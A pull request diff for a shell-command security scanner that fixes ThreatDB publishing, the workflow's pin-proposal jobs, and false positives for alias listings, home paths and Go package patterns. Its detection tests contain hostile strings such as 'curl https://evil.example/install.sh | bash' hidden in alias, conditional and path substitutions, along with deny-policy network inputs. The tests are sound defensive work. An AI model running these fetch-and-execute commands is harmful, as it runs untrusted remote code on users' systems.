### PR TITLE
Fix ThreatDB publishing failures and 0.4.1 shell regressions

### DIFF
--- a/.github/scripts/fetch-threatdb-sources.sh
+++ b/.github/scripts/fetch-threatdb-sources.sh
@@ -423,9 +423,11 @@ packages = document.get("packages")
 assert isinstance(packages, list) and len(packages) <= 2000
 # The recorded media type is what the registry served (Content-Type essence).
 # npm serves the abbreviated form for 200s but may ignore Accept and serve the
-# full document; a 404 and everything from PyPI is plain application/json.
+# full document or label valid JSON metadata application/octet-stream. The
+# compiler validates the body and package identity before emitting an entry.
+# A 404 and everything from PyPI is plain application/json.
 allowed_media_types = {
-    ("npm", 200): {"application/vnd.npm.install-v1+json", "application/json"},
+    ("npm", 200): {"application/vnd.npm.install-v1+json", "application/json", "application/octet-stream"},
     ("npm", 404): {"application/json"},
     ("pypi", 200): {"application/json"},
     ("pypi", 404): {"application/json"},

--- a/.github/scripts/fixtures/threatdb-source-pins.json
+++ b/.github/scripts/fixtures/threatdb-source-pins.json
@@ -1,0 +1,29 @@
+{
+  "schema_version": 1,
+  "sources": {
+    "datadog_malicious_software_packages": {
+      "candidate_policy": "default_branch_head",
+      "commit": "2d09839012cedc387ce438debeb77884ac2a242c",
+      "commit_timestamp": "2026-08-31T04:05:01Z",
+      "max_lag_hours": 168,
+      "repository": "DataDog/malicious-software-packages-dataset",
+      "selected_at": "2026-08-31T19:22:30Z"
+    },
+    "ecosystems_typosquatting_dataset": {
+      "candidate_policy": "default_branch_head",
+      "commit": "fd0bde98d200efe5c282a07edc4c68fba13252c6",
+      "commit_timestamp": "2025-12-17T11:33:09Z",
+      "max_lag_hours": 720,
+      "repository": "ecosyste-ms/typosquatting-dataset",
+      "selected_at": "2026-08-31T19:22:30Z"
+    },
+    "ossf_malicious_packages": {
+      "candidate_policy": "latest_assign_ids",
+      "commit": "54642f7ee96e780b046660519b028fefb635375a",
+      "commit_timestamp": "2026-08-31T18:32:57Z",
+      "max_lag_hours": 48,
+      "repository": "ossf/malicious-packages",
+      "selected_at": "2026-08-31T19:22:30Z"
+    }
+  }
+}

--- a/.github/scripts/test-fetch-threatdb-sources.sh
+++ b/.github/scripts/test-fetch-threatdb-sources.sh
@@ -417,7 +417,7 @@ if PATH="$FAKE_BIN:$PATH" \
    THREATDB_FETCH_OUTPUT_DIR="$OUTPUT_ROOT" \
    THREATDB_COMPILER_BIN="$FAKE_BIN/tirith-threatdb-compile" \
    THREATDB_FETCH_TIMEOUT_BIN="$FAKE_BIN/timeout" \
-   THREATDB_FETCH_TIMEOUT_SECONDS=1 \
+   THREATDB_FETCH_TIMEOUT_SECONDS=5 \
    FAKE_FETCH_HANG=ipblocklist \
    bash "$FETCH_SCRIPT"; then
   touch "$compile_reached"
@@ -440,6 +440,8 @@ fi
 # Blobless clones can lazy-fetch during sparse expansion. The sparse worker is
 # therefore subject to the same per-source timeout as an initial clone, and a
 # timeout must remove all private state before the compiler can run.
+# Allow fixture preparation to finish on loaded runners before the deliberately
+# hung sparse step starts. These test ceilings remain far below production.
 sparse_started="$TEST_ROOT/sparse-per-source-started"
 sparse_terminated="$TEST_ROOT/sparse-per-source-terminated"
 sparse_compiler_called="$TEST_ROOT/sparse-per-source-compiler-called"
@@ -449,7 +451,7 @@ if PATH="$FAKE_BIN:$PATH" \
    THREATDB_FETCH_OUTPUT_DIR="$OUTPUT_ROOT" \
    THREATDB_COMPILER_BIN="$FAKE_BIN/tirith-threatdb-compile" \
    THREATDB_FETCH_TIMEOUT_BIN="$FAKE_BIN/timeout" \
-   THREATDB_FETCH_TIMEOUT_SECONDS=1 \
+   THREATDB_FETCH_TIMEOUT_SECONDS=5 \
    THREATDB_TRANSACTION_TIMEOUT_SECONDS=30 \
    FAKE_SPARSE_HANG=ossf-mp \
    FAKE_SPARSE_STARTED="$sparse_started" \
@@ -495,7 +497,7 @@ if PATH="$FAKE_BIN:$PATH" \
    THREATDB_COMPILER_BIN="$FAKE_BIN/tirith-threatdb-compile" \
    THREATDB_FETCH_TIMEOUT_BIN="$FAKE_BIN/timeout" \
    THREATDB_FETCH_TIMEOUT_SECONDS=30 \
-   THREATDB_TRANSACTION_TIMEOUT_SECONDS=2 \
+   THREATDB_TRANSACTION_TIMEOUT_SECONDS=8 \
    FAKE_SPARSE_HANG=ossf-mp \
    FAKE_SPARSE_STARTED="$sparse_started" \
    FAKE_SPARSE_TERMINATED="$sparse_terminated" \
@@ -506,7 +508,7 @@ else
   status=$?
 fi
 elapsed=$SECONDS
-if (( status == 0 )) || (( elapsed >= 10 )) ||
+if (( status == 0 )) || (( elapsed >= 20 )) ||
    [ ! -s "$sparse_started" ] || [ ! -s "$sparse_terminated" ]; then
   echo "expected aggregate deadline to terminate sparse materialization promptly" >&2
   exit 1
@@ -562,8 +564,8 @@ if PATH="$FAKE_BIN:$PATH" \
    THREATDB_FETCH_OUTPUT_DIR="$OUTPUT_ROOT" \
    THREATDB_COMPILER_BIN="$FAKE_BIN/tirith-threatdb-compile" \
    THREATDB_FETCH_TIMEOUT_BIN="$FAKE_BIN/timeout" \
-   THREATDB_FETCH_TIMEOUT_SECONDS=1 \
-   THREATDB_TRANSACTION_TIMEOUT_SECONDS=2 \
+   THREATDB_FETCH_TIMEOUT_SECONDS=5 \
+   THREATDB_TRANSACTION_TIMEOUT_SECONDS=8 \
    FAKE_COMPILER_HANG=1 \
    bash "$FETCH_SCRIPT"; then
   touch "$compile_reached"

--- a/.github/scripts/test-fetch-threatdb-sources.sh
+++ b/.github/scripts/test-fetch-threatdb-sources.sh
@@ -9,6 +9,10 @@ set -euo pipefail
 
 SCRIPT_DIR=$(cd -- "$(dirname -- "${BASH_SOURCE[0]}")" && pwd -P)
 FETCH_SCRIPT="$SCRIPT_DIR/fetch-threatdb-sources.sh"
+# Fake git and registry responses below describe this immutable test snapshot.
+# The watcher updates the production manifest before running this test, so using
+# that manifest would make every legitimate pin refresh fail the checkout guard.
+export THREATDB_SOURCE_PINS_FILE="$SCRIPT_DIR/fixtures/threatdb-source-pins.json"
 TEST_ROOT=$(mktemp -d "${TMPDIR:-/tmp}/tirith-threatdb-fetch-test.XXXXXX")
 trap 'rm -rf -- "$TEST_ROOT"' EXIT
 
@@ -65,10 +69,21 @@ case "$*" in
     mkdir -p -- "$destination/osv"
     printf 'fixture license\n' > "$destination/LICENSE"
     printf 'fixture readme\n' > "$destination/README.md"
-    for index in $(seq 1 100); do
-      printf '{"id":"MAL-2099-%04d","affected":[{"package":{"ecosystem":"npm","name":"bad-%d"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"}]}]}]}\n' \
-        "$index" "$index" > "$destination/osv/MAL-2099-$(printf '%04d' "$index").json"
-    done
+    # Keep fixture preparation comfortably below the timeout under test, even
+    # while CI is compiling: avoid hundreds of command-substitution processes.
+    python3 - "$destination/osv" <<'PY'
+import json
+from pathlib import Path
+import sys
+root = Path(sys.argv[1])
+for index in range(1, 101):
+    record_id = f"MAL-2099-{index:04d}"
+    record = {"id": record_id, "affected": [{
+        "package": {"ecosystem": "npm", "name": f"bad-{index}"},
+        "ranges": [{"type": "ECOSYSTEM", "events": [{"introduced": "0"}]}],
+    }]}
+    (root / f"{record_id}.json").write_text(json.dumps(record) + "\n")
+PY
     ln -s MAL-2099-0001.json "$destination/osv/linked-record.json"
     ;;
   *DataDog/malicious-software-packages-dataset*)
@@ -124,11 +139,12 @@ while (( $# > 0 )); do
 done
 test -n "$output"
 retrieved_at=$(date -u +%Y-%m-%dT%H:%M:%SZ)
-# Two representative entries so the fetch script's per-package validator rules
+# Representative entries so the fetch script's per-package validator rules
 # (media type per ecosystem/status, resolution consistency) actually execute.
 cat > "$output" <<JSON
 {"schema_version":2,"ossf_commit":"54642f7ee96e780b046660519b028fefb635375a","retrieved_at":"$retrieved_at","packages":[
 {"ecosystem":"npm","name":"fake-live","source_url":"https://registry.npmjs.org/fake-live","media_type":"application/vnd.npm.install-v1+json","http_status":200,"resolution":"registry_versions","response_sha256":"1111111111111111111111111111111111111111111111111111111111111111","response_bytes":64,"versions":["1.0.0","1.0.1"]},
+{"ecosystem":"npm","name":"fake-binary-label","source_url":"https://registry.npmjs.org/fake-binary-label","media_type":"application/octet-stream","http_status":200,"resolution":"registry_versions","response_sha256":"3333333333333333333333333333333333333333333333333333333333333333","response_bytes":96,"versions":["0.0.1-security"]},
 {"ecosystem":"npm","name":"fake-gone","source_url":"https://registry.npmjs.org/fake-gone","media_type":"application/json","http_status":404,"resolution":"package_not_found","response_sha256":"2222222222222222222222222222222222222222222222222222222222222222","response_bytes":21,"versions":[]}
 ]}
 JSON

--- a/.github/scripts/test_threatdb_source_pins.py
+++ b/.github/scripts/test_threatdb_source_pins.py
@@ -12,7 +12,7 @@ import unittest
 
 
 SCRIPT_DIR = Path(__file__).resolve().parent
-MANIFEST = SCRIPT_DIR.parent / "threatdb-source-pins.json"
+MANIFEST = SCRIPT_DIR / "fixtures" / "threatdb-source-pins.json"
 SPEC = importlib.util.spec_from_file_location(
     "threatdb_source_pins", SCRIPT_DIR / "threatdb_source_pins.py"
 )
@@ -103,6 +103,9 @@ class ThreatDbSourcePinsTests(unittest.TestCase):
         for source_name in PINS.SOURCE_ORDER:
             source = self.manifest["sources"][source_name]
             self.assertRegex(source["commit"], r"^[0-9a-f]{40}$")
+
+    def test_production_manifest_is_valid_independently_of_fixture_revisions(self) -> None:
+        PINS.load_manifest(SCRIPT_DIR.parent / "threatdb-source-pins.json")
 
     def test_update_skips_transient_ossf_ingestion_and_is_idempotent(self) -> None:
         with tempfile.TemporaryDirectory() as temporary:

--- a/.github/workflows/threatdb-source-pins.yml
+++ b/.github/workflows/threatdb-source-pins.yml
@@ -9,9 +9,9 @@ concurrency:
   group: threatdb-source-pin-watcher
   cancel-in-progress: false
 
-# Discovery uses this read-only token. Publishing the reviewed candidate branch
-# requires the separately scoped THREATDB_PIN_PR_TOKEN and happens only after a
-# real fetch and compile. This workflow has no signing key or release permission.
+# Discovery and compilation use a read-only token. Branch publication runs on a
+# fresh runner only after the exact candidate passes a real fetch and compile.
+# Neither job receives the production signing key.
 permissions:
   contents: read
 
@@ -20,6 +20,8 @@ jobs:
     if: github.ref == 'refs/heads/main'
     runs-on: ubuntu-latest
     timeout-minutes: 30
+    outputs:
+      changed: ${{ steps.pins.outputs.changed }}
     steps:
       - uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1 # v7.0.1
         with:
@@ -88,21 +90,62 @@ jobs:
             --sign-key-env TIRITH_WATCHER_SIGNING_KEY \
             --output "$RUNNER_TEMP/tirith-threatdb-candidate.dat"
 
-      - name: Require the dedicated PR token
+      - name: Stage the validated proposal
         if: steps.pins.outputs.changed == 'true'
         env:
-          PIN_PR_TOKEN: ${{ secrets.THREATDB_PIN_PR_TOKEN }}
+          REPORT: ${{ steps.pins.outputs.report }}
         run: |
-          if [ -z "$PIN_PR_TOKEN" ]; then
-            echo "::error::THREATDB_PIN_PR_TOKEN is required (contents + pull requests for this repository only)"
+          set -euo pipefail
+          mkdir -p "$RUNNER_TEMP/pin-candidate"
+          cp .github/threatdb-source-pins.json "$RUNNER_TEMP/pin-candidate/pins.json"
+          cp "$REPORT" "$RUNNER_TEMP/pin-candidate/report.md"
+
+      - name: Upload the validated proposal
+        if: steps.pins.outputs.changed == 'true'
+        uses: actions/upload-artifact@043fb46d1a93c77aae656e7c1c64a875d1fc6a0a # v7.0.1
+        with:
+          name: threatdb-pin-candidate
+          path: ${{ runner.temp }}/pin-candidate
+          if-no-files-found: error
+          retention-days: 7
+
+  publish:
+    needs: propose
+    if: github.ref == 'refs/heads/main' && needs.propose.outputs.changed == 'true'
+    runs-on: ubuntu-latest
+    timeout-minutes: 10
+    permissions:
+      contents: write
+      pull-requests: write
+    steps:
+      - uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1 # v7.0.1
+        with:
+          persist-credentials: false
+      - uses: actions/download-artifact@3e5f45b2cfb9172054b4087a40e8e0b5a5461e7c # v8.0.1
+        with:
+          name: threatdb-pin-candidate
+          path: ${{ runner.temp }}/pin-candidate
+      - name: Validate and install the proposed pin manifest
+        run: |
+          set -euo pipefail
+          # The rolling publisher may advance main while candidate compilation
+          # runs. Base the PR on its current manifest, but never publish a
+          # proposal validated against superseded code or source pins.
+          git fetch --quiet --no-tags --depth=1 origin main
+          if ! git diff --quiet HEAD origin/main -- . \
+            ':!threatdb-manifest.json' ':!threatdb-index-v2.json'; then
+            echo "::error::main changed beyond generated ThreatDB pointers during validation; run the watcher again"
             exit 1
           fi
+          git switch --detach origin/main
+          python3 .github/scripts/threatdb_source_pins.py validate \
+            "$RUNNER_TEMP/pin-candidate/pins.json"
+          cp "$RUNNER_TEMP/pin-candidate/pins.json" .github/threatdb-source-pins.json
 
       - name: Publish the automation-owned candidate branch
-        if: steps.pins.outputs.changed == 'true'
         id: branch
         env:
-          PIN_PR_TOKEN: ${{ secrets.THREATDB_PIN_PR_TOKEN }}
+          PIN_PR_TOKEN: ${{ secrets.THREATDB_PIN_PR_TOKEN || github.token }}
         run: |
           set -euo pipefail
           branch="automation/threatdb-source-pins"
@@ -131,20 +174,21 @@ jobs:
           echo "name=$branch" >> "$GITHUB_OUTPUT"
 
       - name: Open or refresh the review PR
-        if: steps.pins.outputs.changed == 'true'
         env:
-          GH_TOKEN: ${{ secrets.THREATDB_PIN_PR_TOKEN }}
-          REPORT: ${{ steps.pins.outputs.report }}
+          GH_TOKEN: ${{ secrets.THREATDB_PIN_PR_TOKEN || github.token }}
+          REPORT: ${{ runner.temp }}/pin-candidate/report.md
           SOURCE_BRANCH: ${{ steps.branch.outputs.name }}
         run: |
           set -euo pipefail
-          head="$GITHUB_REPOSITORY_OWNER:$SOURCE_BRANCH"
+          # gh pr list --head accepts a branch name, not owner:branch. Keep the
+          # owner check separate so repeat runs refresh the existing proposal.
           number=$(gh pr list \
             --repo "$GITHUB_REPOSITORY" \
             --state open \
-            --head "$head" \
-            --json number \
-            --jq '.[0].number // empty')
+            --head "$SOURCE_BRANCH" \
+            --json number,headRepositoryOwner | \
+            jq -r --arg owner "$GITHUB_REPOSITORY_OWNER" \
+              'map(select(.headRepositoryOwner.login == $owner)) | .[0].number // empty')
           if [ -z "$number" ]; then
             gh pr create \
               --repo "$GITHUB_REPOSITORY" \
@@ -157,4 +201,12 @@ jobs:
               --repo "$GITHUB_REPOSITORY" \
               --title "chore(threatdb): refresh source pins" \
               --body-file "$REPORT"
+          fi
+
+      - name: Explain review requirements
+        env:
+          CUSTOM_PR_TOKEN: ${{ secrets.THREATDB_PIN_PR_TOKEN }}
+        run: |
+          if [ -z "$CUSTOM_PR_TOKEN" ]; then
+            echo "The proposal was opened with GITHUB_TOKEN. Approve its pending workflow runs before merging. An optional THREATDB_PIN_PR_TOKEN can trigger those runs without manual approval." >> "$GITHUB_STEP_SUMMARY"
           fi

--- a/crates/tirith-core/src/extract.rs
+++ b/crates/tirith-core/src/extract.rs
@@ -4177,7 +4177,7 @@ pub(crate) fn executable_substitution_scan(
     for segment in tokenize::tokenize(scan_input, shell) {
         if shell != ShellType::PowerShell
             && segment.command.as_deref().is_some_and(|command| {
-                !crate::rules::command::command_word_is_statically_bound(command, shell)
+                !crate::rules::command::command_name_is_statically_bound(command, shell)
             })
             && !(shell == ShellType::Posix
                 && segment
@@ -5617,7 +5617,7 @@ pub(crate) fn posix_current_scope_dispatch_scan(
 ) -> Option<ExecutableSubstitutionScan> {
     let leader_raw = segment.command.as_deref()?;
     let leader = Some(leader_raw).and_then(|command| {
-        crate::rules::command::command_word_is_statically_bound(command, ShellType::Posix)
+        crate::rules::command::command_name_is_statically_bound(command, ShellType::Posix)
             .then(|| crate::rules::command::normalize_cmd_base(command, ShellType::Posix))
     })?;
     let reserved_time = leader == "time" && posix_segment_uses_reserved_time(segment);
@@ -5709,7 +5709,7 @@ fn posix_body_calls_parent_alias(
                 if state.aliases.contains_key(&command) || state.unresolved.contains(&command) {
                     return true;
                 }
-            } else if !crate::rules::command::command_word_is_statically_bound(
+            } else if !crate::rules::command::command_name_is_statically_bound(
                 command_raw,
                 ShellType::Posix,
             ) && (!state.aliases.is_empty() || !state.unresolved.is_empty())
@@ -5786,7 +5786,7 @@ fn recover_posix_parent_dispatch_body(
                     recovered = true;
                     continue;
                 }
-            } else if !crate::rules::command::command_word_is_statically_bound(
+            } else if !crate::rules::command::command_name_is_statically_bound(
                 command_raw,
                 ShellType::Posix,
             ) && (!aliases.aliases.is_empty()
@@ -5855,7 +5855,7 @@ fn expand_literal_alias_body(
         };
         let command = if shell == ShellType::Posix {
             let Some(command) = posix_alias_invocation_name(command_raw) else {
-                if crate::rules::command::command_word_is_statically_bound(command_raw, shell) {
+                if crate::rules::command::command_name_is_statically_bound(command_raw, shell) {
                     return Some(body);
                 }
                 record_shell_execution_gap(scan, ShellExecutionGap::AmbiguousExecutableBody);
@@ -5890,10 +5890,17 @@ fn expand_literal_alias_body(
     None
 }
 
-fn posix_alias_builtin_operands(args: &[String], unalias: bool) -> Result<(Vec<String>, bool), ()> {
+struct PosixAliasOperands {
+    operands: Vec<String>,
+    clear_all: bool,
+    listing_only: bool,
+}
+
+fn posix_alias_builtin_operands(args: &[String], unalias: bool) -> Result<PosixAliasOperands, ()> {
     let mut operands = Vec::new();
     let mut options = true;
     let mut clear_all = false;
+    let mut listing_only = false;
     for raw in args {
         let word = static_wrapper_word(raw, ShellType::Posix).ok_or(())?;
         if options {
@@ -5902,10 +5909,11 @@ fn posix_alias_builtin_operands(args: &[String], unalias: bool) -> Result<(Vec<S
                 continue;
             }
             if let Some(cluster) = word.strip_prefix('-').filter(|cluster| !cluster.is_empty()) {
-                if (!unalias && cluster.chars().all(|option| option == 'p'))
+                if (!unalias && cluster.chars().all(|option| matches!(option, 'p' | 'L')))
                     || (unalias && cluster.chars().all(|option| option == 'a'))
                 {
                     clear_all |= unalias;
+                    listing_only |= !unalias;
                     continue;
                 }
             }
@@ -5916,7 +5924,11 @@ fn posix_alias_builtin_operands(args: &[String], unalias: bool) -> Result<(Vec<S
         }
         operands.push(word);
     }
-    Ok((operands, clear_all))
+    Ok(PosixAliasOperands {
+        operands,
+        clear_all,
+        listing_only,
+    })
 }
 
 fn scan_literal_posix_aliases(raw: &str, shell: ShellType, scan: &mut ExecutableSubstitutionScan) {
@@ -6276,7 +6288,11 @@ fn scan_literal_posix_aliases(raw: &str, shell: ShellType, scan: &mut Executable
             }
             let alias_operands = if shell == ShellType::Posix {
                 match posix_alias_builtin_operands(alias_args, false) {
-                    Ok((operands, _)) => operands,
+                    // Bash `-p` and Zsh `-L` only print aliases, even when an
+                    // operand contains `=`. Never let a listing overwrite a
+                    // previously tracked executable alias body.
+                    Ok(parsed) if parsed.listing_only => continue,
+                    Ok(parsed) => parsed.operands,
                     Err(()) => {
                         record_shell_execution_gap(
                             scan,
@@ -6334,7 +6350,7 @@ fn scan_literal_posix_aliases(raw: &str, shell: ShellType, scan: &mut Executable
                 continue;
             }
             let (names, clear_all) = match posix_alias_builtin_operands(alias_args, true) {
-                Ok(parsed) => parsed,
+                Ok(parsed) => (parsed.operands, parsed.clear_all),
                 Err(()) => {
                     record_shell_execution_gap(scan, ShellExecutionGap::AmbiguousExecutableBody);
                     continue;
@@ -6377,7 +6393,7 @@ fn scan_literal_posix_aliases(raw: &str, shell: ShellType, scan: &mut Executable
             (command_raw == command).then(|| command.clone())
         };
         let Some(alias_command) = alias_command else {
-            if !crate::rules::command::command_word_is_statically_bound(command_raw, shell) {
+            if !crate::rules::command::command_name_is_statically_bound(command_raw, shell) {
                 record_shell_execution_gap(scan, ShellExecutionGap::AmbiguousExecutableBody);
             }
             continue;
@@ -6440,7 +6456,7 @@ fn scan_literal_posix_aliases(raw: &str, shell: ShellType, scan: &mut Executable
                 };
                 literal_rewrites.push((range, command_raw.to_string(), input));
             }
-        } else if !crate::rules::command::command_word_is_statically_bound(command_raw, shell) {
+        } else if !crate::rules::command::command_name_is_statically_bound(command_raw, shell) {
             // A glob/brace/tilde-shaped command is deterministic only when an
             // exact alias expansion happens before those later shell phases.
             record_shell_execution_gap(scan, ShellExecutionGap::AmbiguousExecutableBody);
@@ -12460,6 +12476,17 @@ fn parse_schemeless_destination_inner(s: &str, apply_noise_heuristic: bool) -> O
     {
         return None;
     }
+    // In generic command argv, explicitly relative/home paths (including Go's
+    // `./...` package pattern) are filesystem operands. The stricter parser for
+    // proven network positions keeps the client's interpretation unchanged.
+    if apply_noise_heuristic
+        && (matches!(raw, "." | "..")
+            || raw.starts_with("./")
+            || raw.starts_with("../")
+            || raw.starts_with("~/"))
+    {
+        return None;
+    }
 
     let candidate = if raw.starts_with("//") {
         format!("http:{raw}")
@@ -13589,6 +13616,27 @@ mod tests {
                 .iter()
                 .all(|url| url.raw != "archive.zip")
         );
+    }
+
+    #[test]
+    fn schemeless_local_paths_are_only_filtered_in_generic_argv() {
+        for input in ["./...", "../...", "./pkg/...", "~/.local/lib/python3.11"] {
+            assert!(parse_schemeless_destination(input).is_none(), "{input}");
+        }
+        // When the client's grammar proves this is a URL operand, retain its
+        // host interpretation so network policy cannot be bypassed by `./`.
+        assert_eq!(
+            parse_schemeless_network_destination("./...")
+                .and_then(|url| url.host().map(str::to_owned)),
+            Some(".".to_string())
+        );
+        for input in [
+            "evil.example/payload",
+            "//evil.example/payload",
+            "evil.zip/payload",
+        ] {
+            assert!(parse_schemeless_destination(input).is_some(), "{input}");
+        }
     }
 
     #[test]

--- a/crates/tirith-core/src/rules/command.rs
+++ b/crates/tirith-core/src/rules/command.rs
@@ -652,11 +652,25 @@ pub(crate) fn normalize_cmd_base(raw: &str, shell: ShellType) -> String {
     basename_from_normalized(normalized, shell)
 }
 
-/// Whether a command-position word has one statically determined post-lexing
-/// value. Quotes and deterministic escape sequences are allowed; expansion,
-/// globbing, and splatting are not. This is deliberately separate from
-/// normalization: normalizing `$COMMAND` produces a string, but does not prove
-/// which executable the shell will select at runtime.
+/// Whether a command-position word has a statically determined command name.
+/// Exact POSIX test operators are syntax, not glob patterns. Expanding `~/`
+/// changes only a path prefix; the remaining path must still be static so its
+/// executable basename and arguments receive ordinary command analysis.
+pub(crate) fn command_name_is_statically_bound(raw: &str, shell: ShellType) -> bool {
+    if shell == ShellType::Posix {
+        if matches!(raw, "[" | "[[") {
+            return true;
+        }
+        if raw.starts_with("~/") {
+            return command_word_is_statically_bound(&raw[1..], shell);
+        }
+    }
+    command_word_is_statically_bound(raw, shell)
+}
+
+/// Prove the complete post-lexing value, including its path prefix. Consumers
+/// that reparse argv (such as `env -S`) or resolve a working directory need
+/// this stricter proof: a known executable basename is not enough there.
 pub(crate) fn command_word_is_statically_bound(raw: &str, shell: ShellType) -> bool {
     #[derive(Clone, Copy, PartialEq, Eq)]
     enum Quote {
@@ -1972,7 +1986,7 @@ fn resolve_effective_command_with_environment(
         };
         let base = normalize_cmd_base(command, shell);
         if !is_execution_wrapper(&base, shell) {
-            if !command_word_is_statically_bound(command, shell) {
+            if !command_name_is_statically_bound(command, shell) {
                 return Err(EffectiveCommandError::MissingOrAmbiguousCommand);
             }
             return Ok(EffectiveCommand {
@@ -4656,7 +4670,7 @@ pub fn check_network_policy(
                 let dynamic_leader = segment
                     .command
                     .as_deref()
-                    .is_some_and(|command| !command_word_is_statically_bound(command, shell));
+                    .is_some_and(|command| !command_name_is_statically_bound(command, shell));
                 if unresolved_wrapper || dynamic_leader {
                     findings.push(unresolved_execution_finding(segment, "network policy"));
                 }
@@ -11614,6 +11628,21 @@ fn check_data_exfiltration_depth(
 #[cfg(test)]
 mod tests {
     use super::*;
+
+    #[test]
+    fn known_home_command_names_do_not_prove_argv_values() {
+        for word in ["~/bin/bash", "~/.local/lib/python3.11", "[", "[["] {
+            assert!(command_name_is_statically_bound(word, ShellType::Posix));
+            assert!(
+                !command_word_is_statically_bound(word, ShellType::Posix),
+                "command-name proof must not relax config paths or reparsed argv: {word}"
+            );
+        }
+        for word in ["~/$COMMAND", "~/bin/*", "~/bin/ba[sh]", "~other/bin/bash"] {
+            assert!(!command_name_is_statically_bound(word, ShellType::Posix));
+            assert!(!command_word_is_statically_bound(word, ShellType::Posix));
+        }
+    }
 
     /// Helper: run `check()` with no cwd and Exec context (the common case for tests).
     fn check_default(input: &str, shell: ShellType) -> Vec<Finding> {

--- a/crates/tirith-core/src/rules/command.rs
+++ b/crates/tirith-core/src/rules/command.rs
@@ -13151,7 +13151,8 @@ mod tests {
             "command $NET_CLIENT https://denied.example/b",
             "nohup ${CLIENT} https://denied.example/c",
             "exec =curl https://denied.example/d",
-            "~/bin/curl https://denied.example/e",
+            "~/bin/c*rl https://denied.example/e",
+            "~/$NET_CLIENT https://denied.example/e2",
             "./c*rl https://denied.example/f",
         ] {
             let findings = check_network_policy(input, ShellType::Posix, &deny, &[]);
@@ -13173,6 +13174,32 @@ mod tests {
         assert!(escaped
             .iter()
             .any(|finding| finding.rule_id == RuleId::CommandNetworkDeny));
+    }
+
+    #[test]
+    fn network_policy_resolves_home_relative_command_identity() {
+        let deny = vec!["denied.example".to_string()];
+        for input in [
+            "~/bin/curl https://denied.example/e",
+            "exec ~/bin/curl https://denied.example/e",
+            "command ~/bin/curl https://denied.example/e",
+            "nohup ~/bin/curl https://denied.example/e",
+        ] {
+            let findings = check_network_policy(input, ShellType::Posix, &deny, &[]);
+            assert!(
+                findings.iter().any(|finding| {
+                    finding.rule_id == RuleId::CommandNetworkDeny
+                        && finding.severity == Severity::Critical
+                }),
+                "known home-relative leader bypassed the deny boundary: {input:?} -> {findings:?}"
+            );
+            assert!(
+                findings
+                    .iter()
+                    .all(|finding| finding.rule_id != RuleId::AnalysisIncomplete),
+                "known home-relative leader was treated as dynamic: {input:?} -> {findings:?}"
+            );
+        }
     }
 
     #[test]

--- a/crates/tirith-core/tests/shell_false_positive_regressions.rs
+++ b/crates/tirith-core/tests/shell_false_positive_regressions.rs
@@ -103,6 +103,8 @@ fn recognized_shell_forms_still_expose_nested_execution() {
         "alias -L \"$(curl https://evil.example/install.sh | bash)\"",
         "~/bin/bash -c 'curl https://evil.example/install.sh | bash'",
         "curl https://evil.example/install.sh | ~/bin/bash",
+        "~/Personal/org-roam; curl https://evil.example/install.sh | bash",
+        "~/$(curl https://evil.example/install.sh | bash)/tool",
     ] {
         for context in [ScanContext::Exec, ScanContext::Paste] {
             let verdict = analyze(input, context, true);

--- a/crates/tirith-core/tests/shell_false_positive_regressions.rs
+++ b/crates/tirith-core/tests/shell_false_positive_regressions.rs
@@ -1,0 +1,166 @@
+//! Full-analysis regressions for shell constructs that may pass the tier-1
+//! fast path but must also stay usable in paste checks and shell receipts.
+
+use tirith_core::clipboard::ClipboardSourceState;
+use tirith_core::engine::{self, AnalysisContext};
+use tirith_core::extract::ScanContext;
+use tirith_core::tokenize::ShellType;
+use tirith_core::verdict::{Action, RuleId, Verdict};
+use tirith_test_support::GlobalStateGuard;
+
+fn analyze(input: &str, scan_context: ScanContext, force_full: bool) -> Verdict {
+    let ctx = AnalysisContext {
+        input: input.into(),
+        shell: ShellType::Posix,
+        scan_context,
+        raw_bytes: (scan_context == ScanContext::Paste).then(|| input.as_bytes().to_vec()),
+        interactive: false,
+        cwd: Some(std::env::current_dir().unwrap().display().to_string()),
+        file_path: None,
+        repo_root: None,
+        is_config_override: false,
+        clipboard_html: None,
+        card_ref: None,
+        clipboard_source: ClipboardSourceState::AbsentOrInvalid,
+    };
+    if force_full {
+        engine::analyze_force_full_returning_policy(&ctx).0
+    } else {
+        engine::analyze(&ctx)
+    }
+}
+
+#[test]
+fn zsh_conditionals_and_alias_listings_are_understood() {
+    let _state = GlobalStateGuard::new().unwrap();
+    for input in [
+        "[[ -e /tmp/example ]] && printf yes",
+        "[ -e /tmp/example ] && printf yes",
+        "[[ -n \"$PATH\" ]] && printf yes",
+        "alias -L",
+        "alias -LL",
+        "alias -p",
+        "alias keep='echo safe'\nalias -L keep\nkeep",
+    ] {
+        for context in [ScanContext::Exec, ScanContext::Paste] {
+            let verdict = analyze(input, context, true);
+            assert_eq!(verdict.action, Action::Allow, "{input:?}: {verdict:?}");
+        }
+    }
+}
+
+#[test]
+fn local_package_patterns_stay_clean_in_full_checks_and_pastes() {
+    let _state = GlobalStateGuard::new().unwrap();
+    for input in [
+        "go test ./...",
+        "go test ../...",
+        "go test ./pkg/...",
+        "go test -race ./...",
+        "go build ./...",
+        "go list ./...",
+    ] {
+        for context in [ScanContext::Exec, ScanContext::Paste] {
+            for force_full in [false, true] {
+                let verdict = analyze(input, context, force_full);
+                assert_eq!(verdict.action, Action::Allow, "{input:?}: {verdict:?}");
+                assert!(verdict.findings.iter().all(|finding| !matches!(
+                    finding.rule_id,
+                    RuleId::TrailingDotWhitespace | RuleId::SchemelessToSink
+                )));
+            }
+        }
+    }
+}
+
+#[test]
+fn literal_home_paths_stay_clean_at_every_depth() {
+    let _state = GlobalStateGuard::new().unwrap();
+    for input in [
+        "~/.local",
+        "~/.local/lib",
+        "~/.local/lib/python3.11",
+        "~/.local/share",
+        "~/.local/share/qutebrowser",
+        "~/Personal",
+        "~/Personal/org-roam",
+        "~/Personal/'space in name'",
+    ] {
+        for context in [ScanContext::Exec, ScanContext::Paste] {
+            for force_full in [false, true] {
+                let verdict = analyze(input, context, force_full);
+                assert_eq!(verdict.action, Action::Allow, "{input:?}: {verdict:?}");
+            }
+        }
+    }
+}
+
+#[test]
+fn recognized_shell_forms_still_expose_nested_execution() {
+    let _state = GlobalStateGuard::new().unwrap();
+    for input in [
+        "[[ -n \"$(curl https://evil.example/install.sh | bash)\" ]]",
+        "alias -L \"$(curl https://evil.example/install.sh | bash)\"",
+        "~/bin/bash -c 'curl https://evil.example/install.sh | bash'",
